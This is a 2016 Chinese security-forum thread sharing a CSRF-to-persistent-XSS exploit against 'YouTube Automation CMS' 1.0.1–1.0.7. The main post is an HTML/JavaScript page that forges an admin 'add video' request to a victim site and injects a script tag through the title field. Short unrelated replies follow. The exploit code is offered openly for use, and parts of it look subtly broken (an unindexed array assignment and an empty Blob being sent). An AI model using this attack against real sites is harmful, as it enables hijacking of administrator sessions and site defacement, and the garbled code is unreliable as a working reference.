90_ 发表于 2016-10-19 16:14:15

YouTube 自动化CMS 1.0.7两处XSS

演示视频:https://youtu.be/cCtThSquNSk

CSRF to 持续性 XSS
Version: 1.0.1 to 1.0.7

CSRF Exploit Code:
<html>
<body>
   <title> CSRF to Persistent XSS</title>
    <script>
      function submitRequest()
      {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http://victim.com/admin/videos.php?case=add&youtube_video_url=https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg", true);
      xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
      xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1681718590736");
      xhr.withCredentials = true;
      var body = "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"title\"\r\n" +
          "\r\n" +
          "\"\x3e\x3cscript\x3ealert(/XSSed-By-Arbin/)\x3c/script\x3e\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"details\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"category_id\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"thumbnail\"; filename=\"\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"published\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"duration\"\r\n" +
          "\r\n" +
          "70\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"image\"\r\n" +
          "\r\n" +
          "https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"submit\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1681718590736--\r\n";
      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
          aBody = body.charCodeAt(i);
      xhr.send(new Blob());
      }
    </script>
    <br><br><br>
    <center>
    <h2><font color="red"> CSRF to Persistent XSS by Arbin</font></h2>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
</center>
</body>
</html>

08sec-君子 发表于 2016-10-19 17:36:27

谢谢分享

apptest 发表于 2016-10-19 18:06:21

APP回复测试

Te5tB99 发表于 2016-10-19 18:07:14

test?http://www.huc08.com//mobcent//app/data/phiz/default/03.pnghttp://www.huc08.com//mobcent//app/data/phiz/default/03.png

xiaoye 发表于 2016-10-19 18:18:06

http://www.huc08.com/data/appbyme/upload/audio/201610/19/eljvJwuk7uo2.mp3

admia 发表于 2016-10-20 17:15:39

我他妈一直新手上路
页: [1]
查看完整版本: YouTube 自动化CMS 1.0.7两处XSS